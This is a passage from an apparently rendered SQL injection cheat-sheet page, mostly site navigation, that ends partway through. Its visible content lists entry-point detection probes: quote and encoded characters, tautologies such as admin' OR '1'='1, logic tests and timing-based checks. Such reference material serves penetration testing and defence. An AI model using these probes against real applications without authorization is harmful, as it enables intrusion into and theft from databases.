<a href="../Server%20Side%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" >
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_2" >
<label class="md-nav__link" for="__nav_51_2" id="__nav_51_2_label" tabindex="0">
<span class="md-ellipsis">
CVE Ffmpeg HLS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_2">
<span class="md-nav__icon md-icon"></span>
CVE Ffmpeg HLS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS/" class="md-nav__link">
<span class="md-ellipsis">
FFmpeg HLS vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_3" >
<label class="md-nav__link" for="__nav_51_3" id="__nav_51_3_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_3">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess upload
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_4" >
<label class="md-nav__link" for="__nav_51_4" id="__nav_51_4_label" tabindex="0">
<span class="md-ellipsis">
Configuration Busybox httpd.conf
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_4">
<span class="md-nav__icon md-icon"></span>
Configuration Busybox httpd.conf
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_5" >
<label class="md-nav__link" for="__nav_51_5" id="__nav_51_5_label" tabindex="0">
<span class="md-ellipsis">
Configuration uwsgi.ini
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_5">
<span class="md-nav__icon md-icon"></span>
Configuration uwsgi.ini
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20uwsgi.ini/" class="md-nav__link">
<span class="md-ellipsis">
uWSGI configuration file
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_6" >
<label class="md-nav__link" for="__nav_51_6" id="__nav_51_6_label" tabindex="0">
<span class="md-ellipsis">
Extension Flash
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_6">
<span class="md-nav__icon md-icon"></span>
Extension Flash
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Extension%20Flash/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_7" >
<label class="md-nav__link" for="__nav_51_7" id="__nav_51_7_label" tabindex="0">
<span class="md-ellipsis">
Extension PDF JS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_7">
<span class="md-nav__icon md-icon"></span>
Extension PDF JS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Extension%20PDF%20JS/" class="md-nav__link">
<span class="md-ellipsis">
Generate PDF File Containing JavaScript Code
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_8" >
<label class="md-nav__link" for="__nav_51_8" id="__nav_51_8_label" tabindex="0">
<span class="md-ellipsis">
Picture ImageMagick
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_8">
<span class="md-nav__icon md-icon"></span>
Picture ImageMagick
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Picture%20ImageMagick/" class="md-nav__link">
<span class="md-ellipsis">
ImageMagick Exploits
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_9" >
<label class="md-nav__link" for="__nav_51_9" id="__nav_51_9_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_9">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/XSS%20with%20Relative%20Path%20Overwrite/" class="md-nav__link">
<span class="md-ellipsis">
XSS with Relative Path Overwrite - IE 8/9 and lower
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" >
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#entry-point-detection" class="md-nav__link">
<span class="md-ellipsis">
Entry point detection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dbms-identification" class="md-nav__link">
<span class="md-ellipsis">
DBMS Identification
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sql-injection-using-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
SQL injection using SQLmap
</span>
</a>
<nav class="md-nav" aria-label="SQL injection using SQLmap">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#basic-arguments-for-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
Basic arguments for SQLmap
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#load-a-request-file-and-use-mobile-user-agent" class="md-nav__link">
<span class="md-ellipsis">
Load a request file and use mobile user-agent
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#custom-injection-in-useragentheaderreferercookie" class="md-nav__link">
<span class="md-ellipsis">
Custom injection in UserAgent/Header/Referer/Cookie
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#second-order-injection" class="md-nav__link">
<span class="md-ellipsis">
Second order injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#shell" class="md-nav__link">
<span class="md-ellipsis">
Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#crawl-a-website-with-sqlmap-and-auto-exploit" class="md-nav__link">
<span class="md-ellipsis">
Crawl a website with SQLmap and auto-exploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-tor-with-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
Using TOR with SQLmap
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-a-proxy-with-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
Using a proxy with SQLmap
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-chrome-cookie-and-a-proxy" class="md-nav__link">
<span class="md-ellipsis">
Using Chrome cookie and a Proxy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-suffix-to-tamper-the-injection" class="md-nav__link">
<span class="md-ellipsis">
Using suffix to tamper the injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#general-tamper-option-and-tampers-list" class="md-nav__link">
<span class="md-ellipsis">
General tamper option and tamper's list
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sqlmap-without-sql-injection" class="md-nav__link">
<span class="md-ellipsis">
SQLmap without SQL injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#authentication-bypass" class="md-nav__link">
<span class="md-ellipsis">
Authentication bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#authentication-bypass-raw-md5-sha1" class="md-nav__link">
<span class="md-ellipsis">
Authentication Bypass (Raw MD5 SHA1)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#polyglot-injection-multicontext" class="md-nav__link">
<span class="md-ellipsis">
Polyglot injection (multicontext)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#routed-injection" class="md-nav__link">
<span class="md-ellipsis">
Routed injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#insert-statement-on-duplicate-key-update" class="md-nav__link">
<span class="md-ellipsis">
Insert Statement - ON DUPLICATE KEY UPDATE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#generic-waf-bypass" class="md-nav__link">
<span class="md-ellipsis">
Generic WAF Bypass
</span>
</a>
<nav class="md-nav" aria-label="Generic WAF Bypass">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#white-spaces-alternatives" class="md-nav__link">
<span class="md-ellipsis">
White spaces alternatives
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#no-comma-allowed" class="md-nav__link">
<span class="md-ellipsis">
No Comma Allowed
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#no-equal-allowed" class="md-nav__link">
<span class="md-ellipsis">
No Equal Allowed
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#case-modification" class="md-nav__link">
<span class="md-ellipsis">
Case modification
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="sql-injection">SQL Injection</h1>
<blockquote>
<p>A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.</p>
</blockquote>
<p>Attempting to manipulate SQL queries may have goals including:
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
- Bypassing authorization controls</p>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#cheatsheets">CheatSheets</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md">MSSQL Injection</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md">MySQL Injection</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md">OracleSQL Injection</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md">PostgreSQL Injection</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md">SQLite Injection</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md">Cassandra Injection</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md">HQL Injection</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md">DB2 Injection</a></li>
<li><a href="#entry-point-detection">Entry point detection</a></li>
<li><a href="#dbms-identification">DBMS Identification</a></li>
<li><a href="#sql-injection-using-sqlmap">SQL injection using SQLmap</a></li>
<li><a href="#basic-arguments-for-sqlmap">Basic arguments for SQLmap</a></li>
<li><a href="#load-a-request-file-and-use-mobile-user-agent">Load a request file and use mobile user-agent</a></li>
<li><a href="#custom-injection-in-useragentheaderreferercookie">Custom injection in UserAgent/Header/Referer/Cookie</a></li>
<li><a href="#second-order-injection">Second order injection</a></li>
<li><a href="#shell">Shell</a></li>
<li><a href="#crawl-a-website-with-sqlmap-and-auto-exploit">Crawl a website with SQLmap and auto-exploit</a></li>
<li><a href="#using-tor-with-sqlmap">Using TOR with SQLmap</a></li>
<li><a href="#using-a-proxy-with-sqlmap">Using a proxy with SQLmap</a></li>
<li><a href="#using-chrome-cookie-and-a-proxy">Using Chrome cookie and a Proxy</a></li>
<li><a href="#using-suffix-to-tamper-the-injection">Using suffix to tamper the injection</a></li>
<li><a href="#general-tamper-option-and-tampers-list">General tamper option and tamper's list</a></li>
<li><a href="#sqlmap-without-sql-injection">SQLmap without SQL injection</a></li>
<li><a href="#authentication-bypass">Authentication bypass</a></li>
<li><a href="#authentication-bypass-raw-md5-sha1">Authentication Bypass (Raw MD5 SHA1)</a></li>
<li><a href="#polyglot-injection-multicontext">Polyglot injection</a></li>
<li><a href="#routed-injection">Routed injection</a></li>
<li><a href="#insert-statement---on-duplicate-key-update">Insert Statement - ON DUPLICATE KEY UPDATE</a></li>
<li><a href="#generic-waf-bypass">Generic WAF Bypass</a></li>
<li><a href="#white-spaces-alternatives">White spaces alternatives</a></li>
<li><a href="#no-comma-allowed">No Comma Allowed</a></li>
<li><a href="#no-equal-allowed">No Equal Allowed</a></li>
<li><a href="#case-modification">Case modification</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap">sqlmapproject/sqlmap</a> - Automatic SQL injection and database takeover tool</li>
<li><a href="https://github.com/r0oth3x49/ghauri">r0oth3x49/ghauri</a> - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws</li>
</ul>
<h2 id="entry-point-detection">Entry point detection</h2>
<p>Detection of an SQL injection entry point</p>
<ul>
<li><strong>Error Messages</strong>: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point.</li>
<li>Simple characters
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="err">&#39;</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="o">%</span><span class="mi">27</span>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="err">&quot;</span>
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a><span class="o">%</span><span class="mi">22</span>
<a id="__codelineno-0-5" name="__codelineno-0-5" href="#__codelineno-0-5"></a><span class="o">#</span>
<a id="__codelineno-0-6" name="__codelineno-0-6" href="#__codelineno-0-6"></a><span class="o">%</span><span class="mi">23</span>
<a id="__codelineno-0-7" name="__codelineno-0-7" href="#__codelineno-0-7"></a><span class="p">;</span>
<a id="__codelineno-0-8" name="__codelineno-0-8" href="#__codelineno-0-8"></a><span class="o">%</span><span class="mi">3</span><span class="n">B</span>
<a id="__codelineno-0-9" name="__codelineno-0-9" href="#__codelineno-0-9"></a><span class="p">)</span>
<a id="__codelineno-0-10" name="__codelineno-0-10" href="#__codelineno-0-10"></a><span class="n">Wildcard</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="p">)</span>
<a id="__codelineno-0-11" name="__codelineno-0-11" href="#__codelineno-0-11"></a><span class="o">&amp;</span><span class="n">apos</span><span class="p">;</span><span class="w"> </span><span class="o">#</span><span class="w"> </span><span class="n">required</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">XML</span><span class="w"> </span><span class="n">content</span>
</code></pre></div></li>
<li>Multiple encoding
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="o">%%</span><span class="mi">2727</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="o">%</span><span class="mi">25</span><span class="o">%</span><span class="mi">27</span>
</code></pre></div></li>
<li>
<p>Unicode characters
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a>Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (&quot;)
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a>Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (&#39;)
</code></pre></div></p>
</li>
<li>
<p><strong>Tautology-Based SQL Injection</strong>: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering <code>admin' OR '1'='1</code> in a username field might log you in as the admin if the system is vulnerable.</p>
</li>
<li>Merging characters
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="o">`+</span><span class="n">HERP</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="s1">&#39;||&#39;</span><span class="n">DERP</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="s1">&#39;+&#39;</span><span class="n">herp</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="s1">&#39; &#39;</span><span class="n">DERP</span>
<a id="__codelineno-3-5" name="__codelineno-3-5" href="#__codelineno-3-5"></a><span class="s1">&#39;%20&#39;</span><span class="n">HERP</span>
<a id="__codelineno-3-6" name="__codelineno-3-6" href="#__codelineno-3-6"></a><span class="s1">&#39;%2B&#39;</span><span class="n">HERP</span>
</code></pre></div></li>
<li>
<p>Logic Testing
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="n">page</span><span class="p">.</span><span class="n">asp</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="c1">-- true</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="n">page</span><span class="p">.</span><span class="n">asp</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="err">&#39;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="c1">-- true</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="n">page</span><span class="p">.</span><span class="n">asp</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="err">&quot;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="c1">-- true</span>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="n">page</span><span class="p">.</span><span class="n">asp</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="w"> </span><span class="c1">-- false</span>
</code></pre></div></p>
</li>
<li>
<p><strong>Timing Attacks</strong>: Inputting SQL commands that cause deliberate delays (e.g., using <code>SLEEP</code> or <code>BENCHMARK</code> functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.</p>
</li>
</ul>
<h2 id="dbms-identification">DBMS Identification</h2>
